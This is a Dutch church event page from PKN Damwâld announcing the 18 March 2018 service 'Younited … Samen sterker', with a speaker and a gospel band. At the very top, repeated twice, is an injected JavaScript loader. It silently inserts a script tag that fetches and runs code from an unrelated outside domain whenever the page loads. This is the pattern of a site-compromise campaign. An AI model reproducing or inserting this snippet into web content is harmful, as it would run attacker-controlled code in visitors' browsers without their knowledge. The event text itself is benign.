;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited ... Samen sterker - PKN Damwâld
18 maart 2018
19:30 t/m 21:00
de Ontmoeting
Younited … Samen sterker

Bedrijven besteden jaarlijks miljoenen euro’s aan teambuilding-activiteiten, in de hoop om een bepaalde vorm van eenheid en teamwork te creëren. Dit teamgevoel waar zij naar streven is iets waar wij binnen onze kerk elke dag toegang tot hebben! Omdat we met z’n allen in Jezus geloven, vormen we een groep. We zijn een team, een gemeenschap. En een team helpt elkaar, bij leuke dingen, maar ook bij minder leuke dingen. Daar waar bedrijven enorm veel geld moeten besteden om zo een team te worden, hebben wij de ultieme bindende factor van God gekregen: Jezus.
Samen met Jan van der Meer gaan wij in op wat de kracht van onze gemeenschap nu eigenlijk vormt. Hierbij gesterkt door muziek van gospelband Puur gaan we er weer een mooie dienst van maken, waarbij we hopen je te raken en te inspireren!
Jullie zijn van harte welkom op 18 maart om 19.30 uur in de Ontmoeting. Na afloop van de dienst staat er een drankje en een hapje klaar in het Honk.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld